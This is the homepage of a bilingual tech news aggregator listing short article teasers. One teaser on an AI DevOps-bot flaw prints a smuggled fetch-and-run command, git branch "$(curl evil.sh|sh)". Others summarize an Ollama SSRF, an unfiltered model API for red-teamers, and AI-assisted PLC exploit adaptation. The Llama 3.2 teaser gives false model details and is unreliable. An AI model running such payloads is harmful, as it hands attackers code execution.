Последние материалы
Только RTX-20, RTX-Pro, DGX Spark или Mac с чипом M4 могут подключиться к новому домашнему ИИ-роутеру от NvidiaЗагрузчик моделей Ollama позволяет неавторизованным злоумышленникам красть облачные метаданные через SSRFGoogle Secures 400 MW of Geothermal Power in Utah to Fuel AI by 2028Abliteration.ai Offers Pay-Per-Request Unfiltered GLM-5.3 API for Red-TeamersAWS Labs выпускает aidlc-workflows для внедрения жизненного цикла в работу ИИ-агентов программированияУязвимость DevOps-ботов на базе ИИ: белые списки префиксов позволяют выполнять произвольный кодGoogle запускает функцию Live Voice на базе Gemini для мобильных версий Gmail, Docs и KeepMicrosoft запускает Foundry Toolbox, сокращая использование токенов инструментов на 94%Hackers Can Reach Cloud Metadata IP Through Ollama’s Model DownloaderMeta Open-Sources Llama 3.2, Adding a 70-B Model and a $150M FundLincoln’s Rust Sparks Debate Over US Naval Overstretch and Global ReachСредний Запад может получить новые полномочия «вето» в отношении мега-дата-центров после голосования в ОгайоВнезапные наводнения унесли жизни 1252 человек в Непале, еще 4216 человек пропали без вести в ГималаяхАмериканский авианосец в Паттайе заставил Индию пересмотреть стратегию поддержки океанского флота
На основе ИИ

GyaanSetu

Перейдите по мосту к практическим знаниям в ИИ, вебе, бизнесе и не только.

Последние идеи

Смотреть все

Только RTX-20, RTX-Pro, DGX Spark или Mac с чипом M4 могут подключиться к новому домашнему ИИ-роутеру от Nvidia

В бета-версии Personal AI Router (PAIR) от Nvidia сканирует домашнюю сеть на наличие графических процессоров серии RTX-20, карт RTX-Pro, узлов DGX Spark или Mac с чипом M4, а затем координирует работу простаивающих устройств для локального запуска LLM через Ollama или LM Studio — и всё это с использованием взаимного шифрования TLS.

WebDev · 3 мин чтения

Загрузчик моделей Ollama позволяет неавторизованным злоумышленникам красть облачные метаданные через SSRF

Уязвимость SSRF сохраняется в Ollama 0.33.2, так как загрузчик тензорных моделей использует отдельный HTTP-клиент, который обходит защиту от перенаправлений, добавленную для CVE-2026-5530. Это позволяет злоумышленникам перенаправлять процесс загрузки на любой доступный адрес.

JavaScript · 3 мин чтения

Abliteration.ai Offers Pay-Per-Request Unfiltered GLM-5.3 API for Red-Teamers

The startup’s hosted API lets anyone with a credit-card query an unrestricted version of GLM-5.3, eliminating the need for local GPUs or custom code. While security teams praise the tool for realistic attack simulations, researchers warn it can also churn out step-by-step instructions for cyber-crim

AI · 4 мин чтения

AWS Labs выпускает aidlc-workflows для внедрения жизненного цикла в работу ИИ-агентов программирования

Open-source фреймворк aidlc-workflows добавляет четырехэтапный жизненный цикл — планирование, реализацию, проверку и подготовку к ревью — для существующих ИИ-агентов программирования, позволяя командам отслеживать конкретные метрики, учитывая при этом расход токенов и вариативность моделей.

AI · 3 мин чтения

Уязвимость DevOps-ботов на базе ИИ: белые списки префиксов позволяют выполнять произвольный код

CVE-2026-22708 показывает, что агенты, проверяющие только первый токен команды, могут быть обмануты вредоносной нагрузкой, скрытой в аргументах (например, git branch "$(curl evil.sh|sh)"), что предоставляет злоумышленникам те же привилегии, что и боту автоматизации.

JavaScript · 4 мин чтения

Google запускает функцию Live Voice на базе Gemini для мобильных версий Gmail, Docs и Keep

Новые режимы Live на базе модели Google Gemini позволяют пользователям общаться с Gmail, Docs и Keep на iOS и Android в естественной манере, обеспечивая транскрибацию в реальном времени и плавный переход между запросами, но на данный момент функция доступна только на английском языке и требует премиум-подписки на ИИ.

AI · 2 мин чтения

Microsoft запускает Foundry Toolbox, сокращая использование токенов инструментов на 94%

Foundry Toolbox объединяет управление учетными данными, версионирование и применение политик в единой конечной точке, в то время как Tool Search сокращает промпты до ранжированного списка, уменьшая количество входных токенов на 94% в бенчмарке на 600 инструментов и повышая точность выбора инструментов.

AI · 3 мин чтения

Meta Open-Sources Llama 3.2, Adding a 70-B Model and a $150M Fund

Meta’s Llama 3.2 arrives in three configurations—8 B, 30 B, and 70 B—trained on 2.5 trillion tokens. The new architecture slashes compute needs by 22%, delivering 1.8x faster inference on modern GPUs while remaining fully Apache 2.0 licensed.

AI · 1 мин чтения

Средний Запад может получить новые полномочия «вето» в отношении мега-дата-центров после голосования в Огайо

В ходе ноябрьского голосования жителям предстоит решить, может ли поправка к уставу устанавливать жесткие ограничения на землепользование, потребление электроэнергии и воды для проектов масштаба предлагаемого объекта площадью 300 акров стоимостью 6,9 млрд долларов.

Bharat · 5 мин чтения

Внезапные наводнения унесли жизни 1252 человек в Непале, еще 4216 человек пропали без вести в Гималаях

Стихия, обрушившаяся без предупреждения, также привела к исчезновению 541 человека в Тибете, в результате чего общее число пропавших без вести в регионе достигло 4757, а непальская армия была вынуждена направить экскаваторы в затопленные туннели гидроэлектростанций.

Bharat · 3 мин чтения

Американский авианосец в Паттайе заставил Индию пересмотреть стратегию поддержки океанского флота

После года в море остановка авианосца в Паттайе выявила износ инфраструктуры, психологическое напряжение экипажа и приток 3 миллионов долларов в местную экономику — суровое напоминание о том, что даже ядерные гиганты зависят от хрупких цепочек поставок.

Bharat · 3 мин чтения

ИИ упрощает проведение промышленных атак, адаптируя эксплойты под разные модели ПЛК

Vedere Labs объединила возможности Claude и Ghidra для переработки шелл-кода под другой ПЛК WAGO, добившись выполнения кода и даже превратив устройство в «кирпич». Это доказывает, что ИИ способен автоматизировать адаптацию эксплойтов под контролем человека.

AI · 2 мин чтения
Не пропустите прорыв.
Краткая сводка по каждой теме — каждый день на вашей почте.
Подписаться на сводку →